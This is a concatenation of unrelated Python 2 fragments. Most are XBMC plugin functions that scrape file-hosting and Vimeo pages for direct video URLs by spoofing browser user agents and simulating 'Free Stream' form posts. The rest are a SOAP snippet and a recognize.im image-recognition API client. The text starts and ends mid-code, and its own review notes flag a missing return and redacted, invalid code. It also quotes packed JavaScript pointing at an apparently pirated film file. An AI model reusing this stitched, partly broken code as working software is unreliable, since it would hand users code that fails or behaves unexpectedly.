1="v"0="u"><2 1="b"0="5"/><2 1="c"0="5"/><2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/><8 
w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"></8></7>\');',36,51,'value|name|param|com|http|false|divx|object|embed|plugin|go|bannerEnabled|autoPlay||320px|height|630px|width|none|custommode|avi|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_|Capitancinema|pfq3vaf2xypwtrv77uw334hb55ctx5tcd6dva|182|206|45|73|76|src|auto|bufferingMode|id|download|pluginspage|video|type|embedmvshre|cab|DivXBrowserPlugin|codebase|CC0F21721616|9C46|41fa|D0AB|67DABFBF|clsid|classid|embedcontmvshre|write|document'.split('|'))) </script> </center> ''' # El javascript empaquetado es #eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\'<7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"><2 1="j"0="i"><2 1="v"0="u"><2 1="b"0="5"/><2 1="c"0="5"/><2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/><8 w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"></8></7>\');',36,51,'value|name|param|com|http|false|divx|object|embed|plugin|go|bannerEnabled|autoPlay||320px|height|630px|width|none|custommode|avi|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_|Capitancinema|pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa|182|206|45|73|76|src|auto|bufferingMode|id|download|pluginspage|video|type|embedmvshre|cab|DivXBrowserPlugin|codebase|CC0F21721616|9C46|41fa|D0AB|67DABFBF|clsid|classid|embedcontmvshre|write|document'.split('|'))) ''' eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\' <7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"> <2 1="j"0="i"> <2 1="v"0="u"> <2 1="b"0="5"/> <2 1="c"0="5"/> <2 1="t"0="4://s.r.q.p:o/d/n/m.3.-l.k"/> <8 w="11"v="u"10="z/6"t="4://s.r.q.p:o/d/n/m.3.-l.k"j="i"h="g"f="e"c="5"b="5"y="4://a.6.3/9/x/"> <embed 
id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"> </8> </7>\');',36,51, 0'value 1|name 2|param 3|com 4|http 5|false 6|divx 7|object 8|embed 9|plugin a|go b|bannerEnabled c|autoPlay d| e|320px f|height g|630px h|width i|none j|custommode k|avi l|El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_ m|Capitancinema n|pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa o|182 p|206 q|45 r|73 s|76 t|src u|auto v|bufferingMode w|id x|download y|pluginspage z|video 10|type 11|embedmvshre 12|cab 13|DivXBrowserPlugin 14|codebase 15|CC0F21721616 16|9C46 17|41fa 18|D0AB 19|67DABFBF 1a|clsid 1b|classid 1c|embedcontmvshre 1d|write 1e|document '.split(' |'))) ''' # El javascript desempaquetado es #document.write('<object id="embedcontmvshre"classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616"width="630px"height="320px"codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab"><param name="custommode"value="none"><param name="bufferingMode"value="auto"><param name="bannerEnabled"value="false"/><param name="autoPlay"value="false"/><param name="src"value="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"/><embed id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"></embed></object>'); ''' <object id="embedcontmvshre"classid="clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616"width="630px"height="320px"codebase="http://go.divx.com/plugin/DivXBrowserPlugin.cab"> <param name="custommode"value="none"> 
<param name="bufferingMode"value="auto"> <param name="bannerEnabled"value="false"/> <param name="autoPlay"value="false"/> <param name="src"value="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"/> <embed id="embedmvshre"bufferingMode="auto"type="video/divx"src="http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi"custommode="none"width="630px"height="320px"autoPlay="false"bannerEnabled="false"pluginspage="http://go.divx.com/plugin/download/"> </embed> </object>'); ''' # La URL del video es #http://76.73.45.206:182/d/pfq3vaf2xypwtrv77uw334hb55ctx5qa5wdfa/Capitancinema.com.-El_Concierto__BrSc__Spanish_HOMIEZTEAM__2010_.avi # Lo descifra descifrado = unpackerjs.unpackjs(data) xbmc.output("descifrado=" + descifrado) # Extrae la URL patron = '<param name="src"value="([^"]+)"/>' matches = re.compile(patron, re.DOTALL).findall(descifrado) scrapertools.printMatches(matches) url = "" if len(matches) > 0: url = matches[0] xbmc.output("[metadivx.py] url=" + url) return url
def geturl(urlvideo):
    """Resolve a gigabyteupload.com page URL into the direct video URL.

    Performs two HTTP requests: a plain GET of the page, then a POST that
    simulates clicking the "Free Stream" form.  The response contains a
    packed-JavaScript player block which is unpacked to extract the
    <param name="src" ...> video URL.  Returns "" on any scraping failure.

    Side effects: deletes and rewrites the cookie file at COOKIEFILE and
    installs a process-global cookie-aware opener (urllib2 or ClientCookie).
    """
    xbmc.output("[gigabyupload.py] url=" + urlvideo)
    # ---------------------------------------
    # Initialize the cookie library
    # ---------------------------------------
    ficherocookies = COOKIEFILE
    # Start from a clean cookie jar; ignore a missing file.
    try:
        os.remove(ficherocookies)
    except:
        pass
    # the path and filename to save your cookies in
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        import cookielib
    except ImportError:
        # If importing cookielib fails
        # let's try ClientCookie
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
        # This is a subclass of FileCookieJar
        # that has useful load and save methods
    # ---------------------------------
    # Install the cookies
    # ---------------------------------
    if cj is not None:
        # we successfully imported
        # one of the two cookie handling modules
        if os.path.isfile(ficherocookies):
            # if we have a cookie file already saved
            # then load the cookies into the Cookie Jar
            cj.load(ficherocookies)
        # Now we need to get our Cookie Jar
        # installed in the opener;
        # for fetching URLs
        if cookielib is not None:
            # if we use cookielib
            # then we get the HTTPCookieProcessor
            # and install the opener in urllib2
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            # if we use ClientCookie
            # then we get the HTTPCookieProcessor
            # and install the opener in ClientCookie
            opener = ClientCookie.build_opener(
                ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    #print "-------------------------------------------------------"
    url = urlvideo
    #print url
    #print "-------------------------------------------------------"
    theurl = url
    # an example url that sets a cookie,
    # try different urls here and see the cookie collection you can make !
    txdata = None
    # if we were making a POST type request,
    # we could encode a dictionary of values here,
    # using urllib.urlencode(somedict)
    txheaders = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)'
    }
    # fake a user agent, some websites (like google) don't like automated exploration
    # First request: plain GET of the page.
    # NOTE(review): bare except swallows every error (including cj being
    # None when neither cookie lib loaded) and silently continues with
    # data = "".
    try:
        req = Request(theurl, txdata, txheaders)
        handle = urlopen(req)
        cj.save(ficherocookies)  # save the cookies again
        data = handle.read()
        handle.close()
    except:
        data = ""
        pass
    #print data
    # Request it a second time, as if the banner had been clicked
    patron = 'http\:\/\/www\.gigabyteupload\.com/download\-([^\-]+)\-.*?'
    matches = re.compile(patron, re.DOTALL).findall(url)
    # NOTE(review): unguarded matches[0] -- raises IndexError when the URL
    # does not match the pattern (the trailing .*? in the regex is inert).
    id = matches[0]
    patron = '<form method="post" action="([^"]+)">[^<]+<input type="hidden" name="security_key" value="([^"]+)" \/>'
    #patron += '<p><input type="submit" name="submit" value="([^"]+)" class="cbutton" \/>'
    matches = re.compile(patron, re.DOTALL).findall(data)
    xbmc.output("[gigabyupload.py] fragmentos de la URL : " + str(len(matches)))
    scrapertools.printMatches(matches)
    cecid = ""
    submit = ""
    url2 = theurl
    if len(matches) > 0:
        url2 = matches[0][0]
        #id = matches[0][5]
        cecid = matches[0][1]
        submit = "Watch Online"
        #aff = matches[0][3]
        #came_from = matches[0][4]
    # Build the "Free Stream" form POST body.
    txdata = "op=download&usr_login=&id=" + id + "&security_key=" + cecid + "&submit=" + submit + "&aff=&came_from=referer=&method_free=Free+Stream"
    xbmc.output(txdata)
    # Second request: POST the form.
    try:
        req = Request(url2, txdata, txheaders)
        handle = urlopen(req)
        cj.save(ficherocookies)  # save the cookies again
        data = handle.read()
        handle.close()
        #print data
    except:
        data = ""
        pass
    # Extract the packed (obfuscated) block
    patron = '<div id="player">[^<]+<script type="text/javascript">(eval.*?)</script>'
    matches = re.compile(patron, re.DOTALL).findall(data)
    scrapertools.printMatches(matches)
    data = ""
    if len(matches) > 0:
        data = matches[0]
        xbmc.output("[Gigabyteupload.py] bloque packed=" + data)
    else:
        return ""
    # Unpack it
    descifrado = unpackerjs2.unpackjs(data)
    # Extract the video URL
    xbmc.output("descifrado=" + descifrado)
    # Extract the URL
    patron = '<param name="src" value="([^"]+)"'
    matches = re.compile(patron, re.DOTALL).findall(descifrado)
    scrapertools.printMatches(matches)
    url = ""
    if len(matches) > 0:
        url = matches[0]
    xbmc.output("[gigabyteupload.py] url=" + url)
    return url
def geturl(urlvideo):
    """Resolve a divxden.com page URL into the direct video URL.

    Performs a GET of the page, then a POST simulating the "Free Stream"
    form, extracts the packed-JavaScript block from div#divxshowboxt and
    unpacks it to obtain the <param name="src" .../> video URL.
    Returns "" when the packed block is not found.

    Side effects: deletes and rewrites the cookie file at COOKIEFILE and
    installs a process-global cookie-aware opener (urllib2 or ClientCookie).
    No try/except around the requests here -- network errors propagate.
    """
    xbmc.output("[divxden.py] url=" + urlvideo)
    # ---------------------------------------
    # Initialize the cookie library
    # ---------------------------------------
    ficherocookies = COOKIEFILE
    # Start from a clean cookie jar; ignore a missing file.
    try:
        os.remove(ficherocookies)
    except:
        pass
    # the path and filename to save your cookies in
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        import cookielib
    except ImportError:
        # If importing cookielib fails
        # let's try ClientCookie
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
        # This is a subclass of FileCookieJar
        # that has useful load and save methods
    # ---------------------------------
    # Install the cookies
    # ---------------------------------
    if cj is not None:
        # we successfully imported
        # one of the two cookie handling modules
        if os.path.isfile(ficherocookies):
            # if we have a cookie file already saved
            # then load the cookies into the Cookie Jar
            cj.load(ficherocookies)
        # Now we need to get our Cookie Jar
        # installed in the opener;
        # for fetching URLs
        if cookielib is not None:
            # if we use cookielib
            # then we get the HTTPCookieProcessor
            # and install the opener in urllib2
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            # if we use ClientCookie
            # then we get the HTTPCookieProcessor
            # and install the opener in ClientCookie
            opener = ClientCookie.build_opener(
                ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    #print "-------------------------------------------------------"
    url = urlvideo
    #print url
    #print "-------------------------------------------------------"
    theurl = url
    # an example url that sets a cookie,
    # try different urls here and see the cookie collection you can make !
    txdata = None
    # if we were making a POST type request,
    # we could encode a dictionary of values here,
    # using urllib.urlencode(somedict)
    txheaders = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)'
    }
    # fake a user agent, some websites (like google) don't like automated exploration
    # First request: plain GET (txdata is still None).
    req = Request(theurl, txdata, txheaders)
    handle = urlopen(req)
    cj.save(ficherocookies)  # save the cookies again
    data = handle.read()
    handle.close()
    #print data
    # Request it a second time, as if the banner had been clicked
    patron = 'http\:\/\/www\.divxden\.com/([^\/]+)/(.*?)\.html'
    matches = re.compile(patron, re.DOTALL).findall(url)
    xbmc.output("[divxden.py] fragmentos de la URL")
    scrapertools.printMatches(matches)
    codigo = ""
    nombre = ""
    if len(matches) > 0:
        codigo = matches[0][0]
        nombre = matches[0][1]
    # Build the "Free Stream" form POST body from the URL fragments.
    txdata = "op=download1&usr_login=&id=" + codigo + "&fname=" + nombre + "&referer=&method_free=Free+Stream"
    xbmc.output(txdata)
    req = Request(theurl, txdata, txheaders)
    handle = urlopen(req)
    cj.save(ficherocookies)  # save the cookies again
    data = handle.read()
    handle.close()
    #print data
    # Extract the packed (obfuscated) block
    patron = '<div align="center" id="divxshowboxt">(.*?)</div>'
    matches = re.compile(patron, re.DOTALL).findall(data)
    #scrapertools.printMatches(matches)
    data = ""
    if len(matches) > 0:
        data = matches[0]
        xbmc.output("[divxden.py] bloque packed=" + data)
    else:
        return ""
    # Unpack it
    descifrado = unpackerjs.unpackjs(data)
    # Extract the video URL
    xbmc.output("descifrado=" + descifrado)
    # Extract the URL
    patron = '<param name="src"value="([^"]+)"/>'
    matches = re.compile(patron, re.DOTALL).findall(descifrado)
    scrapertools.printMatches(matches)
    url = ""
    if len(matches) > 0:
        url = matches[0]
    xbmc.output("[divxden.py] url=" + url)
    return url
def getLoginURLDataResponse(url):
    """Open *url* through the ClientCookie opener and return the response.

    The request is sent with the page itself as the Referer plus a fixed
    Chrome user-agent string; the returned object is the raw, unread
    response handle from ClientCookie.urlopen.
    """
    extra_headers = (
        ('Referer', url),
        ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13'),
    )
    req = urllib2.Request(url)
    for header_name, header_value in extra_headers:
        req.add_header(header_name, header_value)
    return ClientCookie.urlopen(req)
""" Copyright (c) 2004 Dustin Sallings <*****@*****.**> """ import sys import urllib2 import traceback try: import cookielib cookieJar = cookielib.CookieJar() cookieProcessor = urllib2.HTTPCookieProcessor(cookieJar) openerFactory = urllib2.build_opener except ImportError: import ClientCookie cookieJar = ClientCookie.MozillaCookieJar() cookieProcessor = ClientCookie.HTTPCookieProcessor(cookieJar) openerFactory = ClientCookie.build_opener class ErrorHandler(urllib2.HTTPDefaultErrorHandler): def http_error_default(self, req, fp, code, msg, hdrs): print "*** Got an error %d ***" % (code, ) # print self, req, fp, code, msg, headers return fp if __name__ == '__main__': headers = {'SOAPAction': 'Inform', 'Content-type': 'text/xml'} url = sys.argv[1]
def geturl(urlvideo):
    """Resolve a Vimeo video id into the moogaloop play URL.

    Fetches the clip's moogaloop XML descriptor, extracts the request
    signature and its expiry, builds the play URL for the configured
    quality ("hd" when quality_flv setting == "1", else "sd"), then opens
    it once to follow redirects and capture the final URL.
    Returns "" when the video has been deleted.

    Side effects: rewrites the cookie file at COOKIEFILE, installs a
    process-global opener, and sets the default socket timeout to 10s.
    """
    videoid = urlvideo
    # ---------------------------------------
    # Initialize the cookie library
    # ---------------------------------------
    ficherocookies = COOKIEFILE
    # Start from a clean cookie jar; ignore a missing file.
    try:
        os.remove(ficherocookies)
    except:
        pass
    #xbmc.output("ficherocookies %s", ficherocookies)
    # the path and filename to save your cookies in
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        import cookielib
    except ImportError:
        # If importing cookielib fails
        # let's try ClientCookie
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
        # This is a subclass of FileCookieJar
        # that has useful load and save methods
    # ---------------------------------
    # Install the cookies
    # ---------------------------------
    if cj is not None:
        # we successfully imported
        # one of the two cookie handling modules
        if os.path.isfile(ficherocookies):
            # if we have a cookie file already saved
            # then load the cookies into the Cookie Jar
            cj.load(ficherocookies)
        # Now we need to get our Cookie Jar
        # installed in the opener;
        # for fetching URLs
        if cookielib is not None:
            # if we use cookielib
            # then we get the HTTPCookieProcessor
            # and install the opener in urllib2
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            # if we use ClientCookie
            # then we get the HTTPCookieProcessor
            # and install the opener in ClientCookie
            opener = ClientCookie.build_opener(
                ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    #print "-------------------------------------------------------"
    url = "http://www.vimeo.com/moogaloop/load/clip:%s/local/" % videoid
    #print url
    #print "-------------------------------------------------------"
    theurl = url
    # an example url that sets a cookie,
    # try different urls here and see the cookie collection you can make !
    txdata = None
    # if we were making a POST type request,
    # we could encode a dictionary of values here,
    # using urllib.urlencode(somedict)
    txheaders = {
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3',
        'Referer': 'http://vimeo/%s' % urlvideo
    }
    # fake a user agent, some websites (like google) don't like automated exploration
    req = Request(theurl, txdata, txheaders)
    handle = urlopen(req)
    #cj.save(ficherocookies) # save the cookies again
    data = handle.read()
    handle.close()
    print data
    # Parse the XML looking for the signature code
    dom = parseString(data)
    xml = dom.getElementsByTagName("xml")
    for node in xml:
        try:
            request_signature = getNodeValue(
                node, "request_signature", "Unknown Uploader").encode("utf-8")
            request_signature_expires = getNodeValue(
                node, "request_signature_expires", "Unknown Uploader").encode("utf-8")
        except:
            # Missing signature nodes mean the video was removed.
            logger.info("Error : Video borrado")
            return ""
    try:
        quality = ((config.getSetting("quality_flv") == "1" and "hd") or "sd")
    except:
        quality = "sd"
    video_url = "http://www.vimeo.com/moogaloop/play/clip:%s/%s/%s/?q=%s" % (
        videoid, request_signature, request_signature_expires, quality)
    print video_url
    # Socket timeout (NOTE(review): original comment said 60 seconds but the
    # code sets 10 -- confirm which is intended)
    socket.setdefaulttimeout(10)
    h = urllib2.HTTPHandler(debuglevel=0)
    request = urllib2.Request(video_url)
    opener = urllib2.build_opener(h)
    urllib2.install_opener(opener)
    # Open once so redirects resolve and geturl() yields the final URL.
    try:
        connexion = opener.open(request)
        video_url = connexion.geturl()
    except urllib2.HTTPError, e:
        xbmc.output("[vimeo.py] error %d (%s) al abrir la url %s" % (e.code, e.msg, video_url))
        print e.read()
    # NOTE(review): no `return video_url` is visible after this point -- the
    # function appears truncated in this copy; on success it falls through
    # returning None.  Confirm against upstream.
class recognizeApi(object):
    """Client for the recognize.im image-recognition API.

    Image management (insert/delete/update, index maintenance, account
    queries) goes through the SOAP endpoint behind ``wsdl``; the actual
    recognition request is a plain REST POST to ``rest``.

    :param client_id: Your unique client ID. You can find it in the
        Account tab after logging in at recognize.im.
    :type client_id: str.
    :param api_key: Your unique API key. You can find it in the Account
        tab after logging in at recognize.im.
    :type api_key: str.
    :param clapi_key: Your unique secret client key. You can find it in
        the Account tab after logging in at recognize.im.
    :type clapi_key: str.
    """

    wsdl = "http://clapi.itraff.pl/wsdl"
    rest = "http://recognize.im/v2/recognize/"
    # Shared jar so the SOAP session cookie survives between requests.
    # NOTE(review): runs at class-definition time; Config and ClientCookie
    # must be importable when this module loads.
    Config.cookieJar = ClientCookie.MozillaCookieJar()

    def __init__(self, client_id, api_key, clapi_key):
        self.client_id = client_id
        self.clapi_key = clapi_key
        self.api_key = api_key
        self._server = WSDL.Proxy(self.wsdl, transport=CookieTransport)
        # Authenticate immediately; the session is kept via the cookie jar.
        self._server.auth(client_id, clapi_key, None)

    def convertOutput(self, soap):
        """Converts SOAPpy.Types.structType to dict.

        :param soap: The SOAP structure to convert.
        :type soap: SOAPpy.Types.structType.
        :returns: dict -- the server response converted to dict.
        """
        d = {}
        # A struct wrapping a single 'item' member is unwrapped first.
        if type(soap).__name__ == 'instance' and 'item' in soap._keys():
            soap = soap[0]
        if type(soap).__name__ == 'list':
            # List of key/value pairs; recurse into nested structures.
            for i in range(0, len(soap)):
                if type(soap[i]['value']).__name__ == 'instance':
                    d[soap[i]['key']] = self.convertOutput(soap[i]['value'])
                else:
                    d[soap[i]['key']] = soap[i]['value']
        elif type(soap).__name__ == 'instance':
            d[soap['key']] = soap['value']
        return d

    def imageInsert(self, image_id, image_name, path):
        """Add new picture to your pictures list.

        :param image_id: A unique identifier of the inserted image.
        :type image_id: str.
        :param image_name: A label you want to assign to the inserted image.
        :type image_name: str.
        :param path: Path to the image file.
        :type path: str.
        :returns: dict -- the server response.
        """
        # Fix: close the file deterministically instead of leaking the handle.
        with open(path, "rb") as image_file:
            encoded = base64.b64encode(image_file.read())
        result = self._server.imageInsert(image_id, image_name, encoded)
        return self.convertOutput(result)

    def indexBuild(self):
        """You need to call indexBuild method in order to apply all your
        recent (from the previous call of this method) changes, including
        adding new images and deleting images.

        :returns: dict -- the server response.
        """
        result = self._server.indexBuild()
        return self.convertOutput(result)

    def callback(self, callback_url):
        """There are some situations when we might need to call one of your
        methods. For example when we finish applying changes we may need to
        let you know that all your images are ready to be recognized.

        :param callback_url: The URL to the method you want us to call.
        :type callback_url: str.
        :returns: dict -- the server response.
        """
        result = self._server.callback(callback_url)
        return self.convertOutput(result)

    def imageDelete(self, image_id):
        """Remove an image from the database so it is no longer
        recognizable.  Pass null value to remove all of your images.

        :param image_id: ID of the image you would like to remove (the same
            ID passed to imageInsert), or null to remove all images.
        :type image_id: str.
        :returns: dict -- the server response.
        """
        result = self._server.imageDelete(image_id)
        return self.convertOutput(result)

    def imageUpdate(self, image_id, new_image_id, new_image_name):
        """Change the name or ID of an image stored in the database.

        :param image_id: ID of the image whose data you want to change
            (the same ID passed to imageInsert).
        :type image_id: str.
        :param new_image_id: New ID of an image.
        :type new_image_id: str.
        :param new_image_name: New name of an image.
        :type new_image_name: str.
        :returns: dict -- the server response.
        """
        data = {"id": new_image_id, "name": new_image_name}
        result = self._server.imageUpdate(image_id, data)
        return self.convertOutput(result)

    def indexStatus(self):
        """Report the progress of applying your changes.

        :returns: dict -- the server response.
        """
        result = self._server.indexStatus()
        return self.convertOutput(result)

    def userLimits(self):
        """Check how many more images you can add and how many scans
        (recognition operations) you have left; limits depend on your
        account type.

        :returns: dict -- the server response.
        """
        result = self._server.userLimits()
        return self.convertOutput(result)

    def imageCount(self):
        """Returns number of images in your list.

        :returns: dict -- the server response.
        """
        result = self._server.imageCount()
        return self.convertOutput(result)

    def imageGet(self, image_id):
        """Returns detailed information about image.

        :param image_id: ID of the image.
        :type image_id: str.
        :returns: dict -- the server response.
        """
        result = self._server.imageGet(image_id)
        return self.convertOutput(result)

    def modeGet(self):
        """Returns recognition mode.

        :returns: dict -- the server response.
        """
        result = self._server.modeGet()
        return self.convertOutput(result)

    def modeChange(self, mode):
        """Changes recognition mode.

        :returns: dict -- the server response.
        """
        result = self._server.modeChange(mode)
        return self.convertOutput(result)

    def recognize(self, path, getAll=False, multi=False, shelf=False):
        """Sends image recognition request.

        The image is validated against the size/dimension limits of the
        chosen mode (single/multi/shelf), then POSTed to the REST endpoint
        with an MD5-of-(api_key + body) integrity header.

        :param path: Path to the image file.
        :type path: str.
        :param getAll: Request all matches, not just the best one.
        :param multi: Use multi-object recognition mode.
        :param shelf: Use shelf recognition mode.
        :returns: dict -- the server response, or an error string when the
            image fails the mode's requirements.
        """
        # fetch image data
        size = os.stat(path).st_size / 1024.0  # KB
        image = Image.open(path)
        width, height = image.size
        area = width * height / 10.0**6  # Mpix
        # check image data against the selected mode's limits
        if (multi):
            if (size > MULTIIR_MAX_FILE_SIZE or
                    width < MULTIIR_MIN_DIMENSION or
                    height < MULTIIR_MIN_DIMENSION or
                    area < MULTIIR_MIN_IMAGE_AREA or
                    area > MULTIIR_MAX_IMAGE_AREA):
                return "Image does not meet the requirements of multi mode query image.\n"
        elif (shelf):
            if (size > SHELFIR_MAX_FILE_SIZE or
                    width < SHELFIR_MIN_DIMENSION or
                    height < SHELFIR_MIN_DIMENSION or
                    area < SHELFIR_MIN_IMAGE_AREA or
                    area > SHELFIR_MAX_IMAGE_AREA):
                return "Image does not meet the requirements of shelf mode query image.\n"
        else:
            if (size > SINGLEIR_MAX_FILE_SIZE or
                    width < SINGLEIR_MIN_DIMENSION or
                    height < SINGLEIR_MIN_DIMENSION or
                    area < SINGLEIR_MIN_IMAGE_AREA or
                    area > SINGLEIR_MAX_IMAGE_AREA):
                return "Image does not meet the requirements of single mode query image.\n"
        # build the mode-specific endpoint URL
        url = self.rest
        if (multi):
            url += 'multi/'
        elif (shelf):
            url += 'shelf/'
        else:
            url += 'single/'
        if (getAll):
            url += 'all/'
        url += self.client_id
        # Fix: close the file deterministically instead of leaking the handle.
        with open(path, "rb") as image_file:
            imageData = image_file.read()
        # Integrity hash over the secret key + payload.
        m = hashlib.md5()
        m.update(self.api_key)
        m.update(imageData)
        md5hash = m.hexdigest()
        headers = {
            'content-type': 'image/jpeg',
            'x-itraff-hash': md5hash}
        request = urllib2.Request(url, imageData, headers)
        response = urllib2.urlopen(request)
        result = response.read()
        # NOTE(review): the server reply is parsed with ast.literal_eval,
        # i.e. it is expected to be a Python-literal-compatible dict.
        return ast.literal_eval(result)

    def drawFrames(self, path, result):
        """Draws frames on image.

        :param path: Path to the image file.
        :type path: str.
        :param result: Recognition results.
        :type result: dict.
        :returns: Image -- Image with frames, or None when recognition
            failed (status != 0).
        """
        if (result['status'] == 0):
            image = Image.open(path)
            draw = ImageDraw.Draw(image)
            # Each object carries a 4-point quadrilateral; draw its edges.
            for obj in result['objects']:
                loc = obj['location']
                draw.line((loc[0]['x'], loc[0]['y'], loc[1]['x'], loc[1]['y']), fill=(255, 0, 0, 255), width=5)
                draw.line((loc[1]['x'], loc[1]['y'], loc[2]['x'], loc[2]['y']), fill=(255, 0, 0, 255), width=5)
                draw.line((loc[2]['x'], loc[2]['y'], loc[3]['x'], loc[3]['y']), fill=(255, 0, 0, 255), width=5)
                draw.line((loc[3]['x'], loc[3]['y'], loc[0]['x'], loc[0]['y']), fill=(255, 0, 0, 255), width=5)
            return image
        else:
            return None
def getmegauploaduser(login, password):
    """Log in to megaupload.com and return the `user` session cookie value.

    POSTs the login form, then scrapes the saved cookie file for the
    ``user=...`` entry.  Returns "" when no session cookie is found.

    Side effects: deletes and rewrites the cookie file at COOKIEFILE and
    installs a process-global cookie-aware opener.

    WARNING(review): part of this function was redacted ("******") in this
    source dump -- see the marked span below.  The redacted text is kept
    verbatim and is NOT valid Python; restore it from upstream history
    before using this block.
    """
    # ---------------------------------------
    # Initialize the cookie library
    # ---------------------------------------
    ficherocookies = COOKIEFILE
    # Start from a clean cookie jar; ignore a missing file.
    try:
        os.remove(ficherocookies)
    except:
        pass
    # the path and filename to save your cookies in
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        import cookielib
    except ImportError:
        # If importing cookielib fails
        # let's try ClientCookie
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
        # This is a subclass of FileCookieJar
        # that has useful load and save methods
    # ---------------------------------
    # Install the cookies
    # ---------------------------------
    if cj is not None:
        # we successfully imported
        # one of the two cookie handling modules
        if os.path.isfile(ficherocookies):
            # if we have a cookie file already saved
            # then load the cookies into the Cookie Jar
            cj.load(ficherocookies)
        # Now we need to get our Cookie Jar
        # installed in the opener;
        # for fetching URLs
        if cookielib is not None:
            # if we use cookielib
            # then we get the HTTPCookieProcessor
            # and install the opener in urllib2
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            # if we use ClientCookie
            # then we get the HTTPCookieProcessor
            # and install the opener in ClientCookie
            opener = ClientCookie.build_opener(
